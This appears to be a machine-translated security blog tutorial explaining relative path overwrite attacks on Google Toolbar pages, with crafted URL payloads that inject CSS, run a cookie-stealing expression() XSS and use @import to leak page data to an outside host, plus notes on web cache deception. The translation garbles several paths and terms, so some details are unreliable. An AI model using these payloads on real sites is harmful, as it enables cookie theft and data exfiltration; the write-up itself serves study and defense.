Anyuntec.com
Attack and defense competition Threat Intelligence Security Service
RPO (relative path overwrite) attack, also known as relative path overwrite attack, depends on the response of browser and network server, and takes advantage of Web caching technology and configuration differences of server.
Author: Li Yuhan
From: Anyun Technology
The example in this article uses CSS to attack,
It is equivalent to using CSS of relative path in the page to cheat,
Let the browser write XSS code into the page.
1、 Initial understanding of RPO attack
Example:
http://www.google.com/tools/toolbar/buttons/apis/howto_guide.html
Web page code
<html>
<head></head>
<title>Google Toolbar API -Guide to Making Custom Buttons</title>
<link href="../../styles.css" rel="stylesheet"type="text/css"/>
[]
</html>
JSP accepts path parameters and all semicolons as parameters such as path; / notpath will also be accepted as a directory
The browser will encode and decode the URL submitted by the user and send it to the server
If you can use% 2F instead of "/"
You can write the URL as http://www.google.com/tools/toolbar/buttons/apis% 2fhowto
Return right
The server received / tools / toolbar / buttons / APIs / howto? Guide.html
The browser received / tools / toolbar / buttons / APIs% 2fhowto? Guide.html
The style sheet imported in the page is / tools / toolbar / buttons /.. / style.css
The browser thinks that the root directory of style.css is tools / toolbar / buttons, not tools / toolbar / button / APIs
So.. / style.css jumps to a higher level directory
There's more room to use
If we fake a directory as fake, we can import a nonexistent tool / fake / styles.css
http://www.google.com/tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html
The directory the server receives is / tools / make /.. / toolbar / buttons / APIs / howto guide.html
The directory received by the browser is / tools / fake /...% 2ftoolbar / buttons / APIs% 2fhowto? Guide.html
The imported style sheet is / tools / make /...% 2ftoolbar / buttons /.. / style.css
The browser thinks that fake / and% 2ftoolbar are two different directories
In this way, you can import any stylesheet under Google domain name
Find a page that can import background with parameters
For example: http://www.google.com/gadgets/directory? Synd = toolbar & frontpage = 1 & Q =% 0A {} * {background: Red}
The source code of the web page is: < div id = "frontend directory page" >
<font size="-1"><divclass="resultNotFound"><p>Search <b>-
{}*{background:red}</b> did not match any gadgets
If http://www.google.com/tools/toolbar/buttons/gallery? Foo = bar is automatically redirected to
http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&foo=bar
So we can construct the load directly
Write XSS code to the URL because the stylesheet requires continuous injection
The payload constructed is http://www.google.com/tools/toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs / howto_guide.html
The request received by the server is / tools / toolbar / buttons / gallery? Q =% 0A {} * {background: Red} /.. / APIs / howto {guide.html
The request received by the browser is / tools / toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs / howto guide.html
The imported style sheet is / tools / toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs /.. / style.css
/tools/toolbar/buttons/gallery?q=%0a{}*{background:red}/style.css
/gadgets/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}/style.css
Stylesheet successfully imported into page
Further, you can import CSS XSS code into it, such as {XSS: Interpretation (alert (document. Cookie))}
PayLoad:http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bxss%253Aexpression(alert(document.cookie))%257D/..%2fapis/style.css
Pop up document.cookie.
Google has set the deep defense setting request: x-content-type-options: nosniff will not insert the properties in the Google Toolbar custom add key into the stylesheet, but IE9 can recognize this request later
This header request was not recognized before IE8
Other browsers such as Firefox and chrome ignore this header request when reading data from the same domain
2、 Further utilization
CSS takes a loose parsing approach to all imported stylesheets
All pages under http://www.google.com/ * can be imported for parsing as style sheets
If the page includes privacy data and injection points, we can use CSS magic to steal them
Conditions of use: 1. The injection point should be before the privacy data
2. White space characters such as% 0A,% 0C,% 0d are allowed at the injection point
3. Privacy data does not include interval
PayLoad:http://www.google.com/search?nord=1&q={}%[email protected]"//innerht.ml?
@Import is an infrequent method, which is easy to be ignored by front-end development. Used to import CSS files. Import precedes other CSS rules except @ charset. So using @ import to introduce CSS can bypass Google's defense in depth.
An import rule of @ import "/ / innerht.ml was created in our payload
Get the information leaked from the page
Then use to get
PayLoad:http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D%2540import%2527%252Fsearch%253Fnord%253D1%2526q%253D%257B%257D%25250a%2540import%252527%252F%252Finnerht.ml%253F%2522/..%2f/apis/howto_guide.html
3、 External transmission:
Web server spoofing request:
When there is a load server on the target website,
When visiting static files such as CSS that do not exist in fact on the current page, there will be a static file page with user account password in the cache server, so that attackers can directly access the user account.
List of file suffixes available for caching:
aif,aiff,au,avi,bin,bmp,cab,carb,cct,cdf,class,css,doc,dcr,dtd,gcf,gff,gif,grv,hdml,hqx,ico,ini,jpeg,jpg, js,mov,mp3,nc,pct,ppc,pws,swa,swf,txt,vbs,w32,wav,wbmp,wml,wmlc,wmls,wmlsc,xsd,zip